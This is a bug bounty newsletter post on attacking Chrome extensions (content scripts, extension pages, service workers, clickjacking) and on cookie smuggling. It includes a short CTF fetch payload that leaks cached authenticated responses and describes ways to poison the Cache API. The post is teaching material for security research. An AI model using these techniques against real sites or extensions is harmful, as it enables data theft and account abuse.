- Critical Thinking - Bug Bounty Podcast
- Posts
- [HackerNotes Ep.95 & Ep.96] Cookies, Caching & Attacking Chrome Extensions with MatanBer
[HackerNotes Ep.95 & Ep.96] Cookies, Caching & Attacking Chrome Extensions with MatanBer
We've got a HUGE double whammy HackerNotes. How to attack Chrome Extensions, understanding the extension threat model and diving deep into extension components. Then we finish off with a bunch of cool cookie parsing behaviours along with some clientside gadgets from the HeroV6 CTF writeup by Kevin Mizu.
Hacker TLDR;
Browser Extensions 101: The TLDR version of the components of an extension:
Content Scripts: Inject code into web pages to interact with the DOM.
Service Workers: Background scripts managing the extension's functionality.
Extension Pages: Internal pages like options or popups, not directly accessible from sites.
Manifest File: The
manifest.json
configures how and where the extension operates.
Gaining access to extension source code: You can grab the extension source code by swapping out the extension ID on this API call:
https://clients2.google.com/service/update2/crx?response=redirect&prodversion=9999&acceptformat=crx2,crx3&x=id%3D[extension_ID]%26uc
Extension Scoping: Check the
manifest.json
file for thematches
key. This will define where the extension is ‘scoped’ and where it will run.Attacking Content Scripts: Content scripts can be attacked from two perspectives; from attacker-controlled pages or from legitimate pages. From an attacker-controlled page, you can perform:
Direct DOM Injection: When a content script injects UI elements directly into the DOM, it creates multiple vulnerabilities:
The attacker’s code on the page can access and read any content within the injected UI elements.
Attackers can also manipulate these elements by dispatching events, allowing them to simulate clicks, scrolls, or other user actions on these injected components.
Closed Shadow DOM Injection: If the UI is rendered within a closed shadow DOM, it provides a layer of isolation, but risks remain:
The shadow DOM prevents direct access by the attacker’s scripts, but techniques like CSS injection can still be used to leak content. Additionally, attackers can employ clickjacking, overlaying elements to trick users into interacting with the shadow DOM UI without realizing it.
Clickjacking remains possible in most scenarios, where the attacker overlays the UI and deceives users into interacting with it unintentionally.
From a legitimate page: the content script has access to the regular browser APIs, making it susceptible to standard client-side attack methods. Standard checks like
postMessage
and universal input sources (hash fragments, query params) - all of your standard attack surfaces are the go-to here. More on this below.
Attacking Extension Pages: Extension pages are not directly accessible from regular websites and have to be attacked through a content script or service worker. Although, Misconfigurations in
web_accessible_resources
can expose internal pages.Attacking Service Workers: When trying to attack a service worker you don’t have a direct line to them from an attacker’s perspective; instead, you have to pivot through an extension page or an attacker-controlled page unless there’s a misconfiguration:
Service workers use message-passing APIs (
chrome.runtime.onConnect
,onMessage
) to communicate. External connections (chrome.runtime.connectExternal
) can be misused if misconfigured.Check the manifest for
externally_connectable
settings that might increase the attack surface and perspective of the service worker.
Debugging extensions: To dynamically debug extensions, you have to go to the dev tools
Settings → Gear in top right corner → Preferences → Sources → Enable search anonymous and content scripts
. Then,Ignore list → Disable content scripts injected by extensions
. , Now, in sources you have a new section ‘sources’ which allows you to debug content scripts, and you can select the extension you want to debug.Debugging service workers:
about:inspect
→ Service workers → Inspect
Heroctf-v6 Writeups: Kevin Mizu dropped some writeups from the Heroctf, packed with cool clientside gadgets. we’ve got cache API and service worker research for you: https://mizu.re/post/heroctf-v6-writeups
We’ve got so much more below but we simply can’t fit it all in. Check it out below!
Remote workforces are a ticking time bomb!
Hybrid and remote work expand your company's surface area of attack beyond corporate firewall boundaries. Employees’ personal computers introduce shadow IT, and home networks with default settings are easy targets, compounded by public Wi-Fi vulnerabilities.
You need to develop a strategy to stay secure while remote employees work across untrusted networks.
To learn how you can secure your company's workforce, get a free copy of the latest ThreatLocker® whitepaper on how to secure remote workforces.
Learn More About the ThreatLocker® Cyber Health Report Here
Browser Extensions 101
Browser extensions are mostly used to add extra features to websites or even to the browser itself. Think of them like little helpers that customize your browsing experience—whether it’s blocking ads, saving passwords, or changing how a page looks.
To do this, extensions need a way to run their own code on the sites they’re enhancing. Plus, they need something to coordinate this process. A good common example is AdBlock; it’s a browser extension that works across tons of sites to block annoying ads.
Extensions usually handle this through content scripts. These scripts inject the extension’s code into the web pages it’s targeting, and they’re managed by a configuration file (a JSON file) that lists the content scripts and the sites they’ll be active on.
There are also different versions of manifest files, which control how extensions interact with the browser. Some older versions are being phased out to simplify and standardize things, with Manifest v3 being the latest version.
In its simplest form, a browser extension is just a bundle of files that includes:
Some JavaScript files to handle different functions.
A bunch of other files like HTML, images, and fonts.
A manifest file, which is basically a big JSON config file telling the extension what to do.
All these files work together to make the extension run on certain sites and access what it needs in your browser:
Browser extension breakdown from https://spaceraccoon.dev/universal-code-execution-browser-extensions/
To do so, the browser extension uses a few components, which communicate with one another via messages (using the message passing API):
Service worker: This is the "brain" of the extension, running quietly in the background, separate from any tabs or windows. It’s the most powerful part of the extension, with access to all the browser features (think of these as tools and functions the extension can use, like saving files or reading web pages). In our example extension, SaveMyJPEGs, the service worker would handle the communication with the example savemyjpegs.com site. It’s like the go-between that coordinates all the action with the content scripts below.
Extension pages: These are web pages hosted by the extension itself and can run JavaScript like any regular web page. They’re things like the extension’s popup and settings page. Unlike regular pages on the web, these can access some browser APIs but aren’t directly accessible from other websites, meaning you can’t just open them or interact with them from a normal site.
Content scripts: These are JavaScript scripts that the extension injects into the pages it wants to work with. For SaveMyJPEGs, a content script could add a "Save" button to every image on a page. It scans for
img
tags and puts that button next to each one, making it easy for users to save images directly.
If you’d like some really good reading before we go any further into browser extensions, check out Spaceraccoon’s writeup here: https://spaceraccoon.dev/universal-code-execution-browser-extensions/ - it’s probably one of the best writeups around browser extension hacking.
To keep things safe, browser extensions run content scripts in what's called an "isolated world." This means the content script can still run on the specified pages, but the page itself can’t mess with the extension's code.
Here’s where it gets interesting: even though the content script runs on the page, it still has full access to the DOM and can interact with everything as needed. However, the page’s code can’t interfere with the extension. So, let’s say a page tries to change something globally, like window.alert
—the page can overwrite it for itself, but the extension's "isolated world" (yeah, sounds funny, I know) stays completely separate and unaffected.
The isolated world is there to protect the content script from a sketchy page messing with it. But sometimes, extensions need to run JavaScript directly in the page’s actual context (outside the isolated world). In these cases, only certain things are shared between the two worlds, like the DOM and a few global variables, such as history.state
.
One way to run code in the page’s context is by adding an actual <script>
element to the DOM (Domlogger does this), or you can use some native options through Chrome’s APIs.
Here’s an important security note: in every attack scenario, it’s impossible to get JavaScript to execute in the extension’s origin. Manifest v3 requires a strict Content Security Policy (CSP) that blocks any outside scripts except the ones bundled with the extension. That doesn’t mean attacks can’t do some serious damage, though—there’s still potential for big impact!
Extension Scoping
So, how do extensions know where and when to run? This question is answered in the manifest.json
file. Looking at the manifest, we can see a matches
array, which looks something like this:
"content_scripts": [
{
"js": [
"js/jquery-3.2.1.min.js",
"js/contentscript.js",
],
"matches": [
"http://*/*",
"https://*/*"
],
"all_frames": true
}
You can set "all_urls"
in an extension to make it run on any page across the web. Here’s where it gets interesting: if you find an XSS vulnerability on a site the extension is set to run on, you can potentially turn that into an attacker-controlled site, which really broadens the threat landscape, but more on this shortly.
Some extensions even have permission to access cookies from other sites, which opens up more options. So, if we manage to XSS a subdomain the extension interacts with, we could use that as a way to attack the extension itself.
But it gets a bit more complex than that. Service workers can also inject content scripts into specific tabs through the chrome.tabs
API. (Here’s more on that if you’re curious: chrome.tabs API documentation).
It’s important to fully understand your code base when reviewing an extension to be able to detect and understand these nuances, otherwise an exploitation opportunity could easily be missed.
Chrome Extension Threat Model
Attacking Content Scripts
From an attacker-controlled page:
If an extension tries to interact with a malicious page using a content script, it can unintentionally create vulnerabilities. Although Chrome provides an "isolated world" to separate extension code from page code, attack vectors still exist.
Because extensions and the page share the same DOM, the page’s JavaScript can still interact with elements injected by the extension. This means that an attacker’s code could potentially manipulate elements created by the extension, such as triggering button clicks or reading any content the extension has added.
These shared DOM interactions open up nonstandard attack surfaces, allowing attackers to exploit the extension’s functionality indirectly.
Furthermore, events in the DOM have a special property called isTrusted
, which indicates if the event was initiated by a genuine user action. For click events, isTrusted
is only set to true
if the user directly performed the action, such as by clicking a button themselves.
This property acts as a defence against scripted attacks, where malicious code tries to simulate user actions. If an attacker uses JavaScript to trigger a click, isTrusted
will be false
, helping to identify it as non-authentic. This isn’t foolproof though, as we all know it is in some cases quite easy to harvest a valid click from a user.
Shadow DOM
Extensions can also use a closed shadow DOM, a method for isolating content within the webpage. A shadow DOM is like a mini-document inside the main document, creating a separate scope that limits what JavaScript can access or modify.
When an extension injects an element as a closed shadow DOM, it’s inaccessible to other scripts on the page. For instance, if function A creates and injects an element into a closed shadow DOM, function B won’t be able to access or alter it directly.
Think of the closed shadow DOM as scoping on roids within the DOM. It provides a secure boundary around the extension’s elements, preventing unwanted interference and helping to maintain control over the injected content.
It might sound safe but you can still mess with styles the DOM uses and also clickjack it by overlaying elements on it. Equally, masatokinugawa did some pretty cool research with font ligatures which allows you to exfil content from a shadow dom through CSS vectors.
So we have a few layers to this specific threat model:
Direct DOM Injection: When a content script injects UI elements directly into the DOM, it creates multiple vulnerabilities:
The attacker’s code on the page can access and read any content within the injected UI elements.
Attackers can also manipulate these elements by dispatching events, allowing them to simulate clicks, scrolls, or other user actions on these injected components.
Closed Shadow DOM Injection: If the UI is rendered within a closed shadow DOM, it provides a layer of isolation, but risks remain:
The shadow DOM prevents direct access by the attacker’s scripts, but techniques like Masato’s CSS exfiltration can still be used to leak content.
Additionally, attackers can employ clickjacking, overlaying elements to trick users into interacting with the shadow DOM UI without realizing it.
iframe Injection: Rendering the UI within an iframe adds a stronger layer of security, limiting content access:
The iframe generally prevents the attacker’s script from reading or manipulating the UI’s content directly.
However, clickjacking remains possible, where the attacker overlays the UI and deceives users into interacting with it unintentionally.
From a legitimate page:
When a content script is embedded in a legitimate page, attacking it can resemble attacking any other standard web page. The “universal malicious input sources,” such as query parameters and postMessage
, operate similarly and can be exploited in comparable ways.
This is because the content script has access to the regular browser APIs, making it susceptible to standard client-side attack methods. Here are a few things to watch for on a legitimate page:
postMessage Listeners: Look out for any
postMessage
listeners the page might use.If any listeners are already set up, they may provide an entry point for injection or manipulation.
In some cases, you may need to trigger an action on the page to activate or register a
postMessage
listener. Without this, the listener might not initially appear as active, making it necessary to interact with the page first
Universal Input Sources: These include common entry points such as query parameters, location sources, hash values, and other dynamic elements.
By manipulating these universal sources, attackers can pass malicious data to the page.
Standard client-side attack techniques, like injecting harmful data into query parameters or manipulating URL fragments, are relevant here.
Attacking Extension Pages
Extension pages are static assets defined within the extension, and they are accessed using the chrome-extension:{ID}
URL scheme. These pages can be thought of as regular web pages but with a strict Content Security Policy (CSP) and additional permissions.
Extension pages can communicate with the background script, which, from an attacker's perspective, provides another potential vector for pivoting. This could be done either through the extension page or via the content script. However, extension pages are not accessible from regular websites — they cannot be loaded in an iframe, referenced by a location, or accessed directly. As a result, accessing these pages can be somewhat complex.
The extension's manifest file includes a key called web_accessible_resources
, which defines patterns for which files are accessible to regular websites. This could allow either all websites or only specific, trusted origins to access certain extension resources.
However, it does not apply to the extension's internal pages (such as popups or options pages). Internal pages, like an extension's popup or options page, cannot be directly accessed by regular websites. These are isolated to the extension's environment and can only be interacted with via the extension's own functionality, such as from a background script or a content script.
What’s interesting, is if you have pageA
that is accessible but pageb
is not, if you can iframe pagea
and redirect it to pageb
, you will be able to get a reference to it. This is a similar technique that was used on a bug on MetaMask, resulting in a $120k clickjack.
Reference: https://medium.com/metamask/metamask-awards-bug-bounty-for-clickjacking-vulnerability-9f53618e3c3a
This is an example of what the MetaMask web_accessible_resources
looked like:
Usually, a malicious website will not be able to interact with extension pages whatsoever. This means the malicious website isn’t allowed to iframe, open, or even redirect to an extension page. As you probably guessed, there are a few ways around this limitation:
If pageA
is web_accessible, and you can make it redirect to pageB
somehow, then you can access pageB
(an otherwise protected resource)
In the context of MetaMask, MetaMask had a specific page used for displaying phishing warnings. This page contained some text along with a hyperlink, and the hyperlink was dynamically linked to the value of a URL parameter. This page was accessible by any origin, meaning it could be loaded on any website without restriction.
MetaMask also had another page — a notification page — which displayed a button that allowed users to accept a pending transaction. This page was designed to prompt users for approval when interacting with Ethereum transactions.
The attack scenario played out as follows: an attacker would first open the phishing notification page in MetaMask, which would typically display a warning to the user. The attacker would then manipulate the URL of the phishing warning page by injecting the URL of the sensitive page (such as the transaction confirmation page). When the victim clicked on the phishing link, the phishing warning page would redirect the user to the transaction confirmation page, which normally wasn’t web-accessible or easily reachable by a regular user.
However, because of the way MetaMask handled the page redirects, it allowed the attacker to "clickjack" the victim. This means the attacker could overlay an invisible iframe or button on top of the legitimate MetaMask confirmation interface. The victim, unaware, would think they were interacting with the phishing page, but in reality, they were clicking on the hidden transaction approval button, which led to unintended actions, like approving a malicious transaction.
This vulnerability was exploited to the tune of $120,000, as the researcher was able to trick victims into unknowingly signing malicious transactions by abusing the combination of the redirect, phishing warnings, and clickjacking techniques.
Gregxsunday dropped a repo and a video on this one which was used to piece together the above, give it a read here: https://github.com/gregxsunday/metamask-clickjacking
Tip: If some page isn’t web_accessible, you can still get a window handle to it if you manage to get a malicious site in the same tab where the inaccessible page was once opened, by iteratively using history.back()
.
Some other things to think of around extensions are authentication and how its implemented. If authentication occurs and the extension has to send authenticated requests, can you combine gadgets to send the authenticated requests elsewhere?
There might be quite a rich attack surface there in itself that’s worth exploring.
Attacking Service Workers
So, service workers. When trying to attack a service worker you don’t have a direct line to them from an attacker’s perspective; instead, you have to pivot through an extension page or an attacker-controlled page.
When a connect script connects to the service worker, you have the equivalent of a message listener for the communication. It looks something like chrome.runtime.onconnect
or chrome.runtime.onmessage
- you call this with a callback function as a parameter, and when the service worker gets a message it will call the onmessage
listener.
When calling this, it will give you back a messagePort
that you can use to communicate back with the extension.
In Chrome, message ports are part of the messaging system used to communicate between different parts of an extension (like background scripts, content scripts, and popup scripts). A MessagePort object allows two-way communication between these scripts.
When a message channel is created, it comes with two ports—one for each side of the connection. Each port can send and receive messages, making it easy to send data back and forth. This is especially useful when you need real-time updates or persistent communication between parts of an extension.
There’s also a way to do this natively with Chrome extensions via chrome.runtime.connect
- its process can be broken down into:
Establish the Connection: A script calls
chrome.runtime.connect
, which returns aPort
object.Send Messages: Use
port.postMessage()
to send messages across this connection.Listen for Messages: Set up an event listener with
port.onMessage.addListener
to respond when messages are received.Close the Connection: The connection stays open until either side disconnects or explicitly calls
port.disconnect()
.
The external version of these two - chrome.runtime.connectExternal
and chrome.runtime.onConnectExternal
- allow other extensions to connect to it as long as the extension explicitly allows it. The breakdown of this:
Setting Permissions: The extension that wants to allow external connections must list the other extension's ID in its manifest under
"externally_connectable"
. This might look like:"externally_connectable": { "ids": ["<other_extension_id>"] }
Initiating the Connection: The extension that wants to connect externally calls
chrome.runtime.connectExternal(extensionId)
, whereextensionId
is the ID of the target extension. This establishes anPort
object to communicate.Listening on the Target Extension: The receiving extension sets up a listener for external connections using
chrome.runtime.onConnectExternal.addListener
, which will fire whenever an external connection request is received. The listener receives aPort
object, which enables two-way communication.Sending and Receiving Messages: Both extensions can use
port.postMessage()
to send messages andport.onMessage.addListener
to receive them, just like with internal connections.Closing the Connection: Either side can close the connection by calling
port.disconnect()
.
It’s worth noting that extension pages can actually listen for external messages too, not just service workers.
These APIs will only exist on origins that are allowed. So you go to an externally connectable page and connect, or if this config doesn’t exist, the attack path would be to get a user to install a malicious browser plugin and priv esc from that context.
Gaining Access to Source Code
All great talk about mapping out attack vectors and understanding the inner workings, but how do we actually figure out if any of this is applicable? For that, we have to jump into the source.
Unfortunately, most of the code of the extension will be minified. The file that Chrome grabs for installation and actually installs is called a crx
file. This .crx
file contains the entire extension contents and it can be unzipped and examined, kind of like an apk
file.
You can grab the crx
files directly from the web store if you use the webstore API. To do this with wget
you’ll need the extension ID and the following endpoint:
https://clients2.google.com/service/update2/crx?response=redirect&prodversion=9999&acceptformat=crx2,crx3&x=id%3D[extension_ID]%26uc
Unfortunately, this endpoint only returns the current version of the APK; there isn’t a way to check prior versions, so it might be worth downloading your target extension every X days and diffing it for changes.
Once you've enabled developer mode, you’ll be able to see each extension’s unique ID listed alongside it. This ID corresponds to the folder name where the extension's files are stored, making it easy to locate the exact directory. By matching this ID with the folder in your profile path, you can directly access the extension’s files for any further configuration or inspection.
This method is especially helpful if you're managing multiple extensions and need to troubleshoot or modify one specifically.
Debugging
To dynamically debug extensions, you have to go to the dev tools settings → gear in top right corner → Preferences → sources → Enable search anonymous and content scripts
. Then, ignore list → Disable content scripts injected by extensions
.
Now, in sources you have a new section ‘sources’ which allows you to debug content scripts, and you can select the extension you want to debug.
Debugging service workers
If you want to debug the service worker, browse to about:inspect
and you have a section for service workers. On the left-hand side, you can see all the service workers to inspect them. Service workers get loaded and unloaded as they’re needed, so they might not always show.
There are other concepts like offscreen pages that exist in extensions which have extensive documentation which may be worth checking out!
That’s enough extension hacking. Let’s jump into some other stuff.
Different stacks parse cookies differently. There are a lot of situations where cookies are parsed differently by the browser and by backend frameworks, which results in a lot of room to manoeuvre in certain contexts.
With cookie injection, you sometimes have cookie attribute injection, where you can only inject attributes, ie:
Request: /set_preference?user_preference=dark; Secure; HttpOnly
Response: Set-Cookie: preference=dark; Secure; HttpOnly; Secure; HttpOnly
That would be a (not very useful) case of injecting additional attributes into a cookie.
Now, what the guys were talking about on the pod was related to cookie parsing logic. This preys on the differences between the browser and various backend technologies in behaviour when parsing cookies with certain characters. The general concept is: You can make cookies extend past the ;
if you use ”
Some of the examples the guys provided on the pod were: x=”evilInjection;y=dontControl”;smuggledCookie=anyvaluehere;
Which the server would parse as x=”evilInjection;y=dontControl”; AND smuggledCookie=anyvaluehere
Behaviour like this means we can trick the backend into parsing unintended attributes and in some cases, entirely new cookies.
There’s more. Some pretty cool research dropped by Ankur Sundara on cookie smuggling and injection - check it out here - also contains a bunch of useful tips, tricks and use cases.
It’s definitely worth a read and one to bookmark and come back to when you find yourself in one of these injection contexts: https://blog.ankursundara.com/cookie-bugs
Another thing to consider if you start going down cookie parsing logic and clientside vectors, in general, is the discrepancy between browsers can be huge. Safari for example breaks the entire parsing logic when a }
it is set in a set-cookie
header from a server, meaning you can comment out some of the attributes.
A prime example is Safari has a globally accessible variable which is only accessible on Safari; no other browser. These kinds of behaviours are the things to consider when crafting POCs, as it could be the difference between exploitable and unexploitable behaviour.
Behaviour like this is also the reason Shazzer by Gareth Heyes exists: https://shazzer.co.uk/
Tip: No Mac to test out Safari? IOS webkit debug proxy will connect to an iPhone and it uses the phone’s remote debugging capabilities, meaning you can test from the Safari browser without a Mac.
Heroctf-v6 writeups
Mizu is one of the few people I have tweet notifications on for, and when he dropped a writeup for a CTF he recently did I must admit, I was intrigued. The writeups delivered as per usual; full of clientside gadgets and behaviours which seem insanely useful.
Let’s jump into some of them.
This one is a cool one. Starting with a finding from BitK back in 2019 - https://issues.chromium.org/issues/40095847 - , whereby you can use the force cache attribute of fetch to pull data out of the cache which you wouldn’t usually be able to access in a normal fetch request.
Chromium mitigated this with double-keyed cache partitioning - this cache takes 3 parameters to create the key:
If you’re familiar with CORs, you’ll know that if you see a server response with the access-control-origin: *
you won’t be able to send a credentialed request; the origin has to be specified. Taken from the blog, Mizu recognized that the initiator of the request is not considered -
‘..Therefore, something interesting about this in Chromium is that it doesn't take the initiator of the request when handling the cache. Why? Because if we fetch() a resource already loaded by an <img> on the same page using fetch(), it will be possible to load the response from the cache!’
Due to that behaviour, Mizu crafted a payload to issue an unauthenticated request but received an authenticated response from the cache:
<img src="<http://cache-cache.heroctf.fr:5100/>">
<script>;
fetch("<http://cache-cache.heroctf.fr:5100/>", {
method: "GET",
cache: "force-cache"
}).then(d => d.text()).then((d) => {
alert(d)
})
</script>
There are a few restrictions stated in the writeup for this to work:
The response must not start with { (CORB).
Response headers must not contain: Vary: Cookie, Cache-Control: no-store, or X-Content-Type: nosniff.
For cross-site exploitation, cookies must be set to None (Google Chrome) and tracking policy deactivated (Chromium).
Could be exploitable on targets where there is same site none specified but you’re running into the access-control-origin: *
problem. Super cool.
The CTF unearthed a tonne of useful gadgets, and this one is no different. The cache API - https://developer.mozilla.org/en-US/docs/Web/API/Cache - used by service workers is exposed (accessible) on the window object.
Accessing the Cache API from window.
With this being accessible, depending on the context of the API used by the service worker, it’s possible to:
Create/poison pages on the website.
Poison existing responses (e.g., .js files).
Service workers are a pretty common implementation across targets too. This is how it was implemented the CTF:
self.addEventListener("fetch", (event) => {
event.respondWith(
caches.match(event.request).then((res) => {
if (res) {
console.log(`Loading from the cache: ${event.request.url}.`);
return res;
What’s interesting about the cache API too is:
You can use this as a limited version of fetch.
The cache is shared with the whole origin.
It can be used to escalate XSS and make it persistent.
Can be a useful gadget if an app is storing session material in session storage and you can use the cache API to hit every tab to harvest it.
There are a ton of awesome write-ups from this CTF, and if you get the chance, I’d definitely recommend checking them out! You can dive into the details and pick up a bunch of cool techniques here: https://mizu.re/post/heroctf-v6-writeups
Well, that’s a wrap for this week! A double whammy HackerNotes.
Till next time!